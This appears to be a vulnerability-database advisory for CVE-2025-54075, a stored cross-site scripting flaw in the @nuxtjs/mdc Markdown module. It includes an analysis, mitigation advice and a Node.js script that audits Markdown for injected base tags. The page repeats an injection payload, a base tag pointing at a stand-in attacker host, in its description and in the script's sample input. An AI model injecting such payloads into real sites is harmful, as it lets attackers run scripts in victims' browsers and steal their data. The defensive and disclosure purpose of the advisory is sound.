CVE-2025-54075: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in nuxt-modules mdc

Severity: High
Type: Vulnerability
Tags: cve, cve-2025-54075, cwe-79
Published: Fri Jul 18 2025 (07/18/2025, 15:47:38 UTC)
Source: CVE Database V5
Vendor/Project: nuxt-modules
Product: mdc

Description

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.

AI-Powered Analysis

Last updated: 07/26/2025, 00:53:00 UTC

Technical Analysis

CVE-2025-54075 is a high-severity stored cross-site scripting (XSS) vulnerability affecting versions of the @nuxtjs/mdc module prior to 0.17.2. MDC is a tool designed to convert Markdown documents into interactive content by deeply integrating with Vue components. The vulnerability arises from improper neutralization of input during web page generation, specifically allowing a Markdown author to inject a `<base href="https://attacker.tld">` HTML element. The `<base>` tag modifies the resolution of all subsequent relative URLs on the page, enabling an attacker to redirect resource loading (scripts, stylesheets, images) to an attacker-controlled domain. This can lead to execution of arbitrary JavaScript within the context of the vulnerable site, compromising confidentiality, integrity, and availability of the web application and its users. The vulnerability requires no authentication or user interaction and can be exploited remotely by submitting malicious Markdown content that is rendered by the vulnerable module. The CVSS v3.1 score of 8.3 reflects the network attack vector, low attack complexity, no privileges or user interaction required, and a scope change that affects resources beyond the vulnerable component. Although no known exploits are currently reported in the wild, the nature of the vulnerability and its ease of exploitation make it a significant risk. The issue was addressed in version 0.17.2 of the @nuxtjs/mdc module by properly sanitizing or restricting the injection of `<base>` elements in Markdown content, preventing attackers from manipulating resource loading and script execution.

Potential Impact

For European organizations, this vulnerability poses a serious threat especially to those using the @nuxtjs/mdc module in their web applications or documentation platforms. Exploitation could lead to unauthorized script execution, enabling attackers to steal sensitive user data such as authentication tokens, perform actions on behalf of users, or deliver further malware payloads. This can result in data breaches, reputational damage, regulatory non-compliance (e.g., GDPR violations), and service disruption. Since the vulnerability affects the rendering of Markdown content, any system that allows user-generated or third-party Markdown input without strict validation is at risk. Attackers could leverage this to target internal tools, customer-facing portals, or developer documentation sites. The ability to manipulate the `<base>` tag also increases the attack surface by redirecting resource loading, potentially bypassing content security policies or other defenses. Given the widespread use of Vue.js and Nuxt.js frameworks in Europe, especially in technology, finance, and government sectors, the impact could be significant if not promptly mitigated.

Mitigation Recommendations

European organizations should immediately upgrade the @nuxtjs/mdc module to version 0.17.2 or later to apply the official fix. Additionally, they should audit all systems that render Markdown content to ensure no untrusted input can inject HTML elements like `<base>`. Implement strict input validation and sanitization on Markdown inputs, possibly using an allowlist of permitted tags and attributes. Employ Content Security Policy (CSP) headers that restrict script and resource loading to trusted domains, mitigating the impact of any injected malicious URLs. Regularly review and monitor logs for unusual requests or content submissions that could indicate exploitation attempts. For internal tools, consider restricting Markdown editing permissions to trusted users only. Finally, conduct security awareness training for developers and content authors about the risks of injecting raw HTML in Markdown and the importance of using updated libraries.
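
The audit recommended above, together with the `<base>` resolution behaviour described in the technical analysis, as an added JavaScript (Node.js) example that is not code from @nuxtjs/mdc or from this page: it finds raw `<base>` elements in Markdown source and lists which resource references would then resolve to a different origin. The function names, `docs.example.com`, and the sample Markdown and resource list are constructed for illustration.

```javascript
// Added example; function names and sample data are hypothetical,
// not part of @nuxtjs/mdc.

// Drop fenced and inline code (simplified matching) so documentation that
// merely shows a <base> tag as code is not flagged. \x60 is a backtick.
function stripCode(markdown) {
  return markdown
    .replace(/^(\x60{3}|~{3})[\s\S]*?^\1[^\n]*$/gm, '')
    .replace(/`[^`\n]*`/g, '');
}

// Return the href (or null) of every raw <base> element in the Markdown.
function findBaseHrefs(markdown) {
  const hrefs = [];
  for (const m of stripCode(markdown).matchAll(/<base(?=[\s/>])([^>]*)>/gi)) {
    const a = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    hrefs.push(a ? (a[1] ?? a[2] ?? a[3]) : null);
  }
  return hrefs;
}

// List the resource references whose origin changes once baseHref applies.
function hijackedResources(pageUrl, baseHref, resources) {
  const page = new URL(pageUrl);
  const base = new URL(baseHref, page); // a relative base href resolves against the page
  return resources
    .filter((ref) => new URL(ref, page).origin !== new URL(ref, base).origin)
    .map((ref) => `${ref} -> ${new URL(ref, base).href}`);
}

// The HTML spec honours only the first <base> element that has an href.
function auditMarkdown(pageUrl, markdown, resources) {
  const href = findBaseHrefs(markdown).find((h) => h !== null);
  return href === undefined ? [] : hijackedResources(pageUrl, href, resources);
}

// Constructed sample input: one raw <base>, one inline mention, one fenced.
const FENCE = '\x60\x60\x60';
const SAMPLE_MD = [
  '# Release notes',
  '<base href="https://attacker.tld">',
  'Inline mention of `<base href="/docs/">` is harmless.',
  FENCE + 'html',
  '<base href="https://example.org/">',
  FENCE,
].join('\n');
const SAMPLE_RESOURCES = ['/assets/app.js', 'img/logo.png', 'https://cdn.example/lib.js'];

console.log(auditMarkdown('https://docs.example.com/guide/intro', SAMPLE_MD, SAMPLE_RESOURCES));
```

A `base-uri 'self'` directive in the site's CSP makes browsers refuse a foreign `<base href>` even if one reaches the rendered page.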

Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-07-16T13:22:18.205Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 687a6fc6a83201eaacf4f8b1

Added to database: 7/18/2025, 4:01:10 PM

Last enriched: 7/26/2025, 12:53:00 AM

Last updated: 9/3/2025, 4:57:12 AM
